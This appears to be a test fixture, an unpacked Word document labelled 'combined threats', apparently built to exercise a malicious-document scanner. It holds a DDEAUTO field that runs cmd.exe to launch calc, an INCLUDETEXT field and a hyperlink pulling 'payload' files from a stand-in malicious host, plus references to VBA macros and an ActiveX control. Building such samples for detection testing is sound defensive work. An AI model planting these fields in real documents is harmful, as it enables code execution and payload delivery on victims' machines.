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in" ContentType="application/vnd.ms-office.vbaProject"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
  <Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>
  <Override PartName="/word/activeX/activeX1.bin" ContentType="application/vnd.ms-office.activeX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sz w:val="32"/>
        </w:rPr>
        <w:t>COMBINED THREATS TEST DOCUMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>This document contains MULTIPLE threat vectors:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. VBA MACROS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>   - AutoOpen() macro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>   - Document_Open() event</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>   - Shell command execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2. DDE FIELD:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:fldSimple w:instr=" DDEAUTO c:\\windows\\system32\\cmd.exe &quot;/k calc.exe&quot; ">
        <w:r>
          <w:t>DDE Exploit Here</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3. ACTIVEX CONTROL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:object w:dxaOrig="1440" w:dyaOrig="720">
          <v:shape xmlns:v="urn:schemas-microsoft-com:vml" id="_x0000_i1025" type="#_x0000_t75" style="width:80pt;height:30pt">
            <v:imagedata xmlns:o="urn:schemas-microsoft-com:office:office" o:title="ActiveX"/>
          </v:shape>
          <o:OLEObject xmlns:o="urn:schemas-microsoft-com:office:office" Type="Embed" ProgID="Forms.CommandButton.1" r:id="rId1"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4. EXTERNAL REFERENCES:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:fldSimple w:instr=" INCLUDETEXT &quot;http://malicious-site.example.com/payload.txt&quot; ">
        <w:r>
          <w:t>External Content</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
    <w:p>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>5. MALICIOUS HYPERLINK:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:t>Click here for payload</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
    <Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/activeXControl" Target="activeX/activeX1.bin"/>
    <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://malicious-site.example.com/payload.exe" TargetMode="External"/>
    <Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>
</Relationships>
</file>